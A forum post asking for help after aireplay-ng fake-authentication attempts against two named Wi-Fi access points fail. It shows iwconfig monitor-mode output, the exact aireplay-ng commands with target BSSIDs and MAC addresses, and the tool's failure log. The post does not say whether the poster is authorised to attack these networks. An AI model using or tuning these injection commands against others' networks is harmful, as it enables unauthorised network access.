ok, it's still not working - below is exactly what i am getting
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11b/g ESSID:off/any Nickname:"Broadcom 4318"
Mode:Monitor Frequency=2.484 GHz Access Point: Invalid
Bit Rate=1 Mb/s Tx-Power=18 dBm
RTS thr:off Fragment thr:off
Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bt ~ # aireplay-ng -1 6000 -o 1 -q 10 -e belkin54g -a 00:30:F1:DD:54:2E -h (MAC ADDRESS) eth1
& I HAVE ALSO TRIED BELOW & SAME
bt ~ # aireplay-ng -1 0 -e BTHomeHub-B5C1 -a 00:18:F6:0B:2E:D7 -h 00:11:50:9F:50:4B eth1
18:48:02 Sending Authentication Request
18:48:04 Sending Authentication Request
18:48:06 Sending Authentication Request
18:48:08 Sending Authentication Request
18:48:11 Sending Authentication Request
18:48:13 Sending Authentication Request
18:48:15 Sending Authentication Request
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID -a option) is correct.
* Try to change the number of packets -o option
* The driver hasn't been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,
Centrino, ndiswrapper and a few others chipsets.
* You're too far from the AP. Get closer, or lower
the transmit rate iwconfig <iface> rate 1M
MAC ADDRESS IS DISABLED
THE BSSID IS CORRECT
CAN ANYONE PLZ ASSIST